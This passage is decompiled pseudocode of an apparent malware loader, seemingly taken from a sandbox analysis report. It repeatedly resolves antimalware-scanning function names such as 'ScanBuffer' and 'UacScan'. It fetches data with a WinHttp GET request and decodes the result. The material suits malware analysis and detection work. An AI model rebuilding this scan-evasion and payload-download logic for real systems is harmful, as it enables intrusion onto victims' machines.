                    						E0327D550( *0x3392814, 0x3392880,  &_v800, E03267AB0( *0x3392838, __eflags), _t7105);
                    						E032644F4(0x33928ac, _v800);
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("OpenSession");
                    						E03264824();
                    						E03264698( &_v804, E03264964(_v808));
                    						_push(_v804);
                    						E032647B0( &_v816,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v812, E03264964(_v816));
                    						_pop(_t6920); // executed
                    						E03277C04(_v812,  *0x33928a8, _t6920, __eflags); // executed
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("ScanBuffer");
                    						E03264824();
                    						E03264698( &_v820, E03264964(_v824));
                    						_push(_v820);
                    						E032647B0( &_v832,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v828, E03264964(_v832));
                    						_pop(_t6925); // executed
                    						E03277C04(_v828,  *0x33928a8, _t6925, __eflags); // executed
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("OpenSession");
                    						E03264824();
                    						E03264698( &_v836, E03264964(_v840));
                    						_push(_v836);
                    						E032647B0( &_v848,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v844, E03264964(_v848));
                    						_pop(_t6930); // executed
                    						E03277C04(_v844,  *0x33928a8, _t6930, __eflags); // executed
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("UacScan");
                    						E03264824();
                    						E03264698( &_v852, E03264964(_v856));
                    						_push(_v852);
                    						E032647B0( &_v864,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v860, E03264964(_v864));
                    						_pop(_t6935); // executed
                    						E03277C04(_v860,  *0x33928a8, _t6935, __eflags); // executed
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("Initialize");
                    						E03264824();
                    						E03264698( &_v868, E03264964(_v872));
                    						_push(_v868);
                    						E032647B0( &_v880,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v876, E03264964(_v880));
                    						_pop(_t6940); // executed
                    						E03277C04(_v876,  *0x33928a8, _t6940, __eflags); // executed
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("ScanBuffer");
                    						E03264824();
                    						E03264698( &_v884, E03264964(_v888));
                    						_push(_v884);
                    						E032647B0( &_v896,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v892, E03264964(_v896));
                    						_pop(_t6945); // executed
                    						E03277C04(_v892,  *0x33928a8, _t6945, __eflags); // executed
                    						_t5093 = E0327D464( *0x33928ac, 0x3286cd8);
                    						__eflags = _t5093;
                    						if(_t5093 != 0) {
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("ScanBuffer");
                    							E03264824();
                    							E03264698( &_v900, E03264964(_v904));
                    							_push(_v900);
                    							E032647B0( &_v912,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v908, E03264964(_v912));
                    							_pop(_t6951); // executed
                    							E03277C04(_v908,  *0x33928a8, _t6951, __eflags); // executed
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v916, E03264964(_v920));
                    							_push(_v916);
                    							E032647B0( &_v928,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v924, E03264964(_v928));
                    							_pop(_t6956); // executed
                    							E03277C04(_v924,  *0x33928a8, _t6956, __eflags); // executed
                    							_push(0);
                    							L0326CD94();
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v932, E03264964(_v936));
                    							_push(_v932);
                    							E032647B0( &_v944,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v940, E03264964(_v944));
                    							_pop(_t6961); // executed
                    							E03277C04(_v940,  *0x33928a8, _t6961, __eflags); // executed
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("UacScan");
                    							E03264824();
                    							E03264698( &_v948, E03264964(_v952));
                    							_push(_v948);
                    							E032647B0( &_v960,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v956, E03264964(_v960));
                    							_pop(_t6966); // executed
                    							E03277C04(_v956,  *0x33928a8, _t6966, __eflags); // executed
                    							E03276DC0("WinHttp.WinHttpRequest.5.1", 0x3392880,  &_v964, _t7104, _t7105, __eflags); // executed
                    							E0327287C(0x3392804, _v964);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v968, E03264964(_v972));
                    							_push(_v968);
                    							E032647B0( &_v980,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v976, E03264964(_v980));
                    							_pop(_t6973); // executed
                    							E03277C04(_v976,  *0x33928a8, _t6973, __eflags); // executed
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("ScanString");
                    							E03264824();
                    							E03264698( &_v984, E03264964(_v988));
                    							_push(_v984);
                    							E032647B0( &_v996,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v992, E03264964(_v996));
                    							_pop(_t6978); // executed
                    							E03277C04(_v992,  *0x33928a8, _t6978, __eflags); // executed
                    							_push(0);
                    							_push(0x33928ac);
                    							E0326E3E0(0, 0x3392804, 0x3286d10, "GET"); // executed
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v1000, E03264964(_v1004));
                    							_push(_v1000);
                    							E032647B0( &_v1012,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1008, E03264964(_v1012));
                    							_pop(_t6983); // executed
                    							E03277C04(_v1008,  *0x33928a8, _t6983, __eflags); // executed
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("ScanBuffer");
                    							E03264824();
                    							E03264698( &_v1016, E03264964(_v1020));
                    							_push(_v1016);
                    							E032647B0( &_v1028,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1024, E03264964(_v1028));
                    							_pop(_t6988); // executed
                    							E03277C04(_v1024,  *0x33928a8, _t6988, __eflags); // executed
                    							_push(0x3286d1c);
                    							_push(0x3392804);
                    							_push(0); // executed
                    							E0326E3E0(); // executed
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v1032, E03264964(_v1036));
                    							_push(_v1032);
                    							E032647B0( &_v1044,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1040, E03264964(_v1044));
                    							_pop(_t6993); // executed
                    							E03277C04(_v1040,  *0x33928a8, _t6993, __eflags); // executed
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("ScanString");
                    							E03264824();
                    							E03264698( &_v1048, E03264964(_v1052));
                    							_push(_v1048);
                    							E032647B0( &_v1060,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1056, E03264964(_v1060));
                    							_pop(_t6998); // executed
                    							E03277C04(_v1056,  *0x33928a8, _t6998, __eflags); // executed
                    							_push(0x3286d28);
                    							_push(0x3392804);
                    							_push( &_v1076);
                    							E0326E3E0();
                    							_t7108 = _t7108 + 0x30;
                    							E032717CC(0x3392834, 0x3392880,  &_v1076, _t7104, _t7105, _t7125);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("Initialize");
                    							E03264824();
                    							E03264698( &_v1080, E03264964(_v1084));
                    							_push(_v1080);
                    							E032647B0( &_v1092,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1088, E03264964(_v1092));
                    							_pop(_t7004); // executed
                    							E03277C04(_v1088,  *0x33928a8, _t7004, __eflags); // executed
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("ScanString");
                    							E03264824();
                    							E03264698( &_v1096, E03264964(_v1100));
                    							_push(_v1096);
                    							E032647B0( &_v1108,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1104, E03264964(_v1108));
                    							_pop(_t7009); // executed
                    							E03277C04(_v1104,  *0x33928a8, _t7009, __eflags); // executed
                    							_v1112 =  *0x3392834;
                    							_t5273 = _v1112;
                    							__eflags = _t5273;
                    							if(_t5273 != 0) {
                    								_t5334 = _t5273 - 4;
                    								__eflags = _t5334;
                    								_t5273 =  *_t5334;
                    							}
                    							__eflags = _t5273 - 0x7530;
                    							if(_t5273 > 0x7530) {
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v1116, E03264964(_v1120));
                    								_push(_v1116);
                    								E032647B0( &_v1128,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v1124, E03264964(_v1128));
                    								_pop(_t7024);
                    								E03277C04(_v1124,  *0x33928a8, _t7024, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("ScanBuffer");
                    								E03264824();
                    								E03264698( &_v1132, E03264964(_v1136));
                    								_push(_v1132);
                    								E032647B0( &_v1144,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v1140, E03264964(_v1144));
                    								_pop(_t7029);
                    								E03277C04(_v1140,  *0x33928a8, _t7029, __eflags);
                    								E0327D858( *0x3392834,  *0x33928a8,  &_v1148);
                    								E032644F4(0x3392874, _v1148);
                    							}
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("Initialize");
                    							E03264824();
                    							E03264698( &_v1152, E03264964(_v1156));
                    							_push(_v1152);
                    							E032647B0( &_v1164,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1160, E03264964(_v1164));
                    							_pop(_t7014); // executed
                    							E03277C04(_v1160,  *0x33928a8, _t7014, __eflags); // executed
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("UacScan");
                    							E03264824();
                    							E03264698( &_v1168, E03264964(_v1172));
                    							_push(_v1168);
                    							E032647B0( &_v1180,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1176, E03264964(_v1180));
                    							_pop(_t7019); // executed
                    							E03277C04(_v1176,  *0x33928a8, _t7019, __eflags); // executed
                    							L0326CD9C();
                    						}
                    					}
                    				} else {
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("Initialize");
                    					E03264824();
                    					E03264698( &_v388, E03264964(_v392));
                    					_push(_v388);
                    					E032647B0( &_v400,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v396, E03264964(_v400));
                    					_pop(_t7036);
                    					E03277C04(_v396,  *0x33928a8, _t7036, _t7114);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("OpenSession");
                    					E03264824();
                    					E03264698( &_v404, E03264964(_v408));
                    					_push(_v404);
                    					E032647B0( &_v416,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v412, E03264964(_v416));
                    					_pop(_t7041);
                    					E03277C04(_v412,  *0x33928a8, _t7041, _t7114);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanBuffer");
                    					E03264824();
                    					E03264698( &_v420, E03264964(_v424));
                    					_push(_v420);
                    					E032647B0( &_v432,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v428, E03264964(_v432));
                    					_pop(_t7046);
                    					E03277C04(_v428,  *0x33928a8, _t7046, _t7114);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("Initialize");
                    					E03264824();
                    					E03264698( &_v436, E03264964(_v440));
                    					_push(_v436);
                    					E032647B0( &_v448,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v444, E03264964(_v448));
                    					_pop(_t7051);
                    					E03277C04(_v444,  *0x33928a8, _t7051, _t7114);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanBuffer");
                    					E03264824();
                    					E03264698( &_v452, E03264964(_v456));
                    					_push(_v452);
                    					E032647B0( &_v464,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v460, E03264964(_v464));
                    					_pop(_t7056);
                    					E03277C04(_v460,  *0x33928a8, _t7056, _t7114);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("OpenSession");
                    					E03264824();
                    					E03264698( &_v468, E03264964(_v472));
                    					_push(_v468);
                    					E032647B0( &_v480,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v476, E03264964(_v480));
                    					_pop(_t7061);
                    					E03277C04(_v476,  *0x33928a8, _t7061, _t7114);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("OpenSession");
                    					E03264824();
                    					E03264698( &_v484, E03264964(_v488));
                    					_push(_v484);
                    					E032647B0( &_v496,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v492, E03264964(_v496));
                    					_pop(_t7066);
                    					E03277C04(_v492,  *0x33928a8, _t7066, _t7114);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanBuffer");
                    					E03264824();
                    					E03264698( &_v500, E03264964(_v504));
                    					_push(_v500);
                    					E032647B0( &_v512,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v508, E03264964(_v512));
                    					_pop(_t7071);
                    					E03277C04(_v508,  *0x33928a8, _t7071, _t7114);
                    					_t5448 = E0327CCD4( *0x3392838, 0x3392880, _t7071, _t7104, _t7105, _t7114, _t7125);
                    					_t7115 = _t5448 - 1;
                    					if(_t5448 == 1) {
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("Initialize");
                    						E03264824();
                    						E03264698( &_v516, E03264964(_v520));
                    						_push(_v516);
                    						E032647B0( &_v528,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v524, E03264964(_v528));
                    						_pop(_t7076);
                    						E03277C04(_v524,  *0x33928a8, _t7076, _t7115);
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("OpenSession");
                    						E03264824();
                    						E03264698( &_v532, E03264964(_v536));
                    						_push(_v532);
                    						E032647B0( &_v544,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v540, E03264964(_v544));
                    						_pop(_t7081);
                    						E03277C04(_v540,  *0x33928a8, _t7081, _t7115);
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("ScanBuffer");
                    						E03264824();
                    						E03264698( &_v548, E03264964(_v552));
                    						_push(_v548);
                    						E032647B0( &_v560,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v556, E03264964(_v560));
                    						_pop(_t7086);
                    						E03277C04(_v556,  *0x33928a8, _t7086, _t7115);
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("ScanBuffer");
                    						E03264824();
                    						E03264698( &_v564, E03264964(_v568));
                    						_push(_v564);
                    						E032647B0( &_v576,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v572, E03264964(_v576));
                    						_pop(_t7091);
                    						E03277C04(_v572,  *0x33928a8, _t7091, _t7115);
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("OpenSession");
                    						E03264824();
                    						E03264698( &_v580, E03264964(_v584));
                    						_push(_v580);
                    						E032647B0( &_v592,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v588, E03264964(_v592));
                    						_pop(_t7096);
                    						E03277C04(_v588,  *0x33928a8, _t7096, _t7115);
                    					}
                    				}
                    				_push(0x3286aa0);
                    				_push( *0x33928a8);
                    				_push("OpenSession");
                    				E03264824();
                    				E03264698( &_v1184, E03264964(_v1188));
                    				_push(_v1184);
                    				E032647B0( &_v1196,  *0x33928a8, 0x3286aa0);
                    				E03264698( &_v1192, E03264964(_v1196));
                    				_pop(_t5976); // executed
                    				E03277C04(_v1192,  *0x33928a8, _t5976, _t7115); // executed
                    				_push(0x3286aa0);
                    				_push( *0x33928a8);
                    				_push("ScanString");
                    				E03264824();
                    				E03264698( &_v1200, E03264964(_v1204));
                    				_push(_v1200);
                    				E032647B0( &_v1212,  *0x33928a8, 0x3286aa0);
                    				E03264698( &_v1208, E03264964(_v1212));
                    				_pop(_t5981); // executed
                    				E03277C04(_v1208,  *0x33928a8, _t5981, _t7115); // executed
                    				_v1112 =  *0x3392874;
                    				_t2477 = _v1112;
                    				if(_t2477 != 0) {
                    					_t2477 =  *((intOrPtr*)(_t2477 - 4));
                    				}
                    				_t7118 = _t2477 - 0x493e0;
                    				if(_t2477 <= 0x493e0) {
                    					L49:
                    					__eflags = 0;
                    					_pop(_t5982);
                    					 *[fs:eax] = _t5982;
                    					_push(0x3286a75);
                    					E032644C4( &_v4824, 0x64);
                    					E032644C4( &_v4424, 0x18);
                    					E03264C24( &_v4328);
                    					E032644A0( &_v4324);
                    					E03264C24( &_v4320);
                    					E032644C4( &_v4316, 0x47);
                    					E032644C4( &_v4024, 2);
                    					E032644C4( &_v4032, 2);
                    					E032644C4( &_v4016, 0xd);
                    					E03264C24( &_v3964);
                    					E032644C4( &_v3960, 0x54);
                    					E032644C4( &_v3624, 0x26);
                    					E03264C3C( &_v3472, 3);
                    					E032644C4( &_v3460, 8);
                    					E03264C3C( &_v3428, 6);
                    					E032644C4( &_v3404, 0x10);
                    					E032644C4( &_v3084, 0x1d);
                    					E032644C4( &_v2968, 4);
                    					E03264C24( &_v2952);
                    					E032644A0( &_v2948);
                    					E03264C24( &_v2944);
                    					E032644C4( &_v2940, 0x26);
                    					E03264C24( &_v2788);
                    					E032644A0( &_v2784);
                    					E03264C24( &_v2780);
                    					E032644C4( &_v2776, 0x19);
                    					E03264C24( &_v2676);
                    					E032644A0( &_v2672);
                    					E03264C24( &_v2668);
                    					E032644C4( &_v2664, 0x16);
                    					E032644C4( &_v2568, 2);
                    					E032644C4( &_v2576, 2);
                    					E03264C24( &_v2560);
                    					E032644A0( &_v2556);
                    					E03264C24( &_v2552);
                    					E032644C4( &_v2548, 0x5e);
                    					E032644A0( &_v2160);
                    					E032644C4( &_v2172, 3);
                    					E032644C4( &_v2156, 0x43);
                    					E03264C24( &_v1888);
                    					E032644A0( &_v1884);
                    					E03264C24( &_v1880);
                    					E032644C4( &_v1876, 0x19);
                    					E032644C4( &_v1768, 2);
                    					E032644C4( &_v1776, 2);
                    					E032644C4( &_v1760, 0x56);
                    					_t6009 =  *0x327ca10; // 0x327ca14
                    					E032657A0( &_v1416, _t6009);
                    					E032644C4( &_v1412, 8);
                    					E032644C4( &_v1376, 3);
                    					E032644A0( &_v1380);
                    					E032644C4( &_v1364, 0x3f);
                    					E032644C4( &_v1108, 8);
                    					E0326E3D8( &_v1076);
                    					E032644C4( &_v1060, 0x18);
                    					E03265E70( &_v964);
                    					E032644C4( &_v952, 2);
                    					E032644C4( &_v960, 2);
                    					E032644C4( &_v944, 0x41);
                    					_t6018 =  *0x327ca10; // 0x327ca14
                    					E032657A0( &_v684, _t6018);
                    					E032644C4( &_v680, 8);
                    					E03264C24( &_v648);
                    					E032644C4( &_v644, 0x15);
                    					E032644C4( &_v552, 2);
                    					E032644C4( &_v560, 2);
                    					E032644C4( &_v544, 0x5f);
                    					E032644C4( &_v160, 3);
                    					E032644A0( &_v164);
                    					return E032644C4( &_v148, 0x24);
                    				} else {
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanBuffer");
                    					E03264824();
                    					E03264698( &_v1216, E03264964(_v1220));
                    					_push(_v1216);
                    					E032647B0( &_v1228,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1224, E03264964(_v1228));
                    					_pop(_t6030);
                    					E03277C04(_v1224,  *0x33928a8, _t6030, _t7118);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("Initialize");
                    					E03264824();
                    					E03264698( &_v1232, E03264964(_v1236));
                    					_push(_v1232);
                    					E032647B0( &_v1244,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1240, E03264964(_v1244));
                    					_pop(_t6035);
                    					E03277C04(_v1240,  *0x33928a8, _t6035, _t7118);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("OpenSession");
                    					E03264824();
                    					E03264698( &_v1248, E03264964(_v1252));
                    					_push(_v1248);
                    					E032647B0( &_v1260,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1256, E03264964(_v1260));
                    					_pop(_t6040);
                    					E03277C04(_v1256,  *0x33928a8, _t6040, _t7118);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanBuffer");
                    					E03264824();
                    					E03264698( &_v1264, E03264964(_v1268));
                    					_push(_v1264);
                    					E032647B0( &_v1276,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1272, E03264964(_v1276));
                    					_pop(_t6045);
                    					E03277C04(_v1272,  *0x33928a8, _t6045, _t7118);
                    					E0327D550( *0x3392874, 0x3392880,  &_v1280, E03267AB0( *0x3392838, _t7118), _t7105);
                    					E032644F4(0x3392800, _v1280);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("Initialize");
                    					E03264824();
                    					E03264698( &_v1284, E03264964(_v1288));
                    					_push(_v1284);
                    					E032647B0( &_v1296,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1292, E03264964(_v1296));
                    					_pop(_t6052);
                    					E03277C04(_v1292,  *0x33928a8, _t6052, _t7118);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanString");
                    					E03264824();
                    					E03264698( &_v1300, E03264964(_v1304));
                    					_push(_v1300);
                    					E032647B0( &_v1312,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1308, E03264964(_v1312));
                    					_pop(_t6057);
                    					E03277C04(_v1308,  *0x33928a8, _t6057, _t7118);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("OpenSession");
                    					E03264824();
                    					E03264698( &_v1316, E03264964(_v1320));
                    					_push(_v1316);
                    					E032647B0( &_v1328,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1324, E03264964(_v1328));
                    					_pop(_t6062);
                    					E03277C04(_v1324,  *0x33928a8, _t6062, _t7118);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanBuffer");
                    					E03264824();
                    					E03264698( &_v1332, E03264964(_v1336));
                    					_push(_v1332);
                    					E032647B0( &_v1344,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1340, E03264964(_v1344));
                    					_pop(_t6067);
                    					E03277C04(_v1340,  *0x33928a8, _t6067, _t7118);
                    					E0327D4EC( *0x3392800,  *0x33928a8,  &_v1348);
                    					E032644F4(0x3392830, _v1348);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("Initialize");
                    					E03264824();
                    					E03264698( &_v1352, E03264964(_v1356));
                    					_push(_v1352);
                    					E032647B0( &_v1364,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1360, E03264964(_v1364));
                    					_pop(_t6074);
                    					E03277C04(_v1360,  *0x33928a8, _t6074, _t7118);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanString");
                    					E03264824();
                    					E03264698( &_v1368, E03264964(_v1372));
                    					_push(_v1368);
                    					E032647B0( &_v1380,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1376, E03264964(_v1380));
                    					_pop(_t6079);
                    					E03277C04(_v1376,  *0x33928a8, _t6079, _t7118);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("OpenSession");
                    					E03264824();
                    					E03264698( &_v1384, E03264964(_v1388));
                    					_push(_v1384);
                    					E032647B0( &_v1396,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1392, E03264964(_v1396));
                    					_pop(_t6084);
                    					E03277C04(_v1392,  *0x33928a8, _t6084, _t7118);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanBuffer");
                    					E03264824();
                    					E03264698( &_v1400, E03264964(_v1404));
                    					_push(_v1400);
                    					E032647B0( &_v1412,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1408, E03264964(_v1412));
                    					_pop(_t6089);
                    					E03277C04(_v1408,  *0x33928a8, _t6089, _t7118);
                    					_t6090 =  *0x3289ae4; // 0x5b7194
                    					E03264728( &_v1420, _t6090);
                    					E0327CD4C( *0x3392830, 0x3392880,  &_v1416, _v1420, _t7104, _t7105);
                    					_t5590 =  *0x327ca10; // 0x327ca14
                    					E032657DC(0x3392880, _t5590, _v1416);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("Initialize");
                    					E03264824();
                    					E03264698( &_v1424, E03264964(_v1428));
                    					_push(_v1424);
                    					E032647B0( &_v1436,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1432, E03264964(_v1436));
                    					_pop(_t6097);
                    					E03277C04(_v1432,  *0x33928a8, _t6097, _t7118);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanString");
                    					E03264824();
                    					E03264698( &_v1440, E03264964(_v1444));
                    					_push(_v1440);
                    					E032647B0( &_v1452,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1448, E03264964(_v1452));
                    					_pop(_t6102);
                    					E03277C04(_v1448,  *0x33928a8, _t6102, _t7118);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("OpenSession");
                    					E03264824();
                    					E03264698( &_v1456, E03264964(_v1460));
                    					_push(_v1456);
                    					E032647B0( &_v1468,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1464, E03264964(_v1468));
                    					_pop(_t6107);
                    					E03277C04(_v1464,  *0x33928a8, _t6107, _t7118);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanBuffer");
                    					E03264824();
                    					E03264698( &_v1472, E03264964(_v1476));
                    					_push(_v1472);
                    					E032647B0( &_v1484,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1480, E03264964(_v1484));
                    					_pop(_t6112);
                    					E03277C04(_v1480,  *0x33928a8, _t6112, _t7118);
                    					E032644F4(0x33928d4,  *((intOrPtr*)( *0x3392880 + 4)));
                    					E032644F4(0x33928cc,  *((intOrPtr*)( *0x3392880 + 8)));
                    					E032644F4(0x339286c,  *((intOrPtr*)( *0x3392880 + 0xc)));
                    					E032644F4(0x33928d0,  *((intOrPtr*)( *0x3392880 + 0x10)));
                    					E032644F4(0x33928b8,  *((intOrPtr*)( *0x3392880 + 0x14)));
                    					E032644F4(0x33928bc,  *((intOrPtr*)( *0x3392880 + 0x18)));
                    					E032644F4(0x33928c0,  *((intOrPtr*)( *0x3392880 + 0x1c)));
                    					E032644F4(0x33928c4,  *((intOrPtr*)( *0x3392880 + 0x20)));
                    					E032644F4(0x33928b0,  *((intOrPtr*)( *0x3392880 + 0x24)));
                    					E032644F4(0x3392824,  *((intOrPtr*)( *0x3392880 + 0x28)));
                    					E032644F4(0x3392828,  *((intOrPtr*)( *0x3392880 + 0x2c)));
                    					E032644F4(0x339282c,  *((intOrPtr*)( *0x3392880 + 0x30)));
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("OpenSession");
                    					E03264824();
                    					E03264698( &_v1488, E03264964(_v1492));
                    					_push(_v1488);
                    					E032647B0( &_v1500,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1496, E03264964(_v1500));
                    					_pop(_t6141);
                    					E03277C04(_v1496,  *0x33928a8, _t6141, _t7118);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanString");
                    					E03264824();
                    					E03264698( &_v1504, E03264964(_v1508));
                    					_push(_v1504);
                    					E032647B0( &_v1516,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1512, E03264964(_v1516));
                    					_pop(_t6146);
                    					E03277C04(_v1512,  *0x33928a8, _t6146, _t7118);
                    					E03264698( &_v1520, E03264964( *0x339287c));
                    					_t2912 = E03267E64(_v1520);
                    					_t7119 = _t2912;
                    					if(_t2912 == 0) {
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("Initialize");
                    						E03264824();
                    						E03264698( &_v1524, E03264964(_v1528));
                    						_push(_v1524);
                    						E032647B0( &_v1536,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v1532, E03264964(_v1536));
                    						_pop(_t6897);
                    						E03277C04(_v1532,  *0x33928a8, _t6897, _t7119);
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("ScanBuffer");
                    						E03264824();
                    						E03264698( &_v1540, E03264964(_v1544));
                    						_push(_v1540);
                    						E032647B0( &_v1552,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v1548, E03264964(_v1552));
                    						_pop(_t6902);
                    						E03277C04(_v1548,  *0x33928a8, _t6902, _t7119);
                    						E03264698( &_v1556, E03264964( *0x339287c));
                    						E0326802C(_v1556);
                    					}
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("OpenSession");
                    					E03264824();
                    					E03264698( &_v1560, E03264964(_v1564));
                    					_push(_v1560);
                    					E032647B0( &_v1572,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1568, E03264964(_v1572));
                    					_pop(_t6152);
                    					E03277C04(_v1568,  *0x33928a8, _t6152, _t7119);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanBuffer");
                    					E03264824();
                    					E03264698( &_v1576, E03264964(_v1580));
                    					_push(_v1576);
                    					E032647B0( &_v1588,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1584, E03264964(_v1588));
                    					_pop(_t6157);
                    					E03277C04(_v1584,  *0x33928a8, _t6157, _t7119);
                    					_v1112 =  *0x33928cc;
                    					_t5539 = _v1112;
                    					if(_t5539 != 0) {
                    						_t5539 =  *(_t5539 - 4);
                    					}
                    					_t7122 = _t5539 - 3;
                    					E032649C4( *0x33928cc, _t5539 - 3, 1, 0x33928cc);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("OpenSession");
                    					E03264824();
                    					E03264698( &_v1592, E03264964(_v1596));
                    					_push(_v1592);
                    					E032647B0( &_v1604,  *0x33928a8, 0x3286aa0);
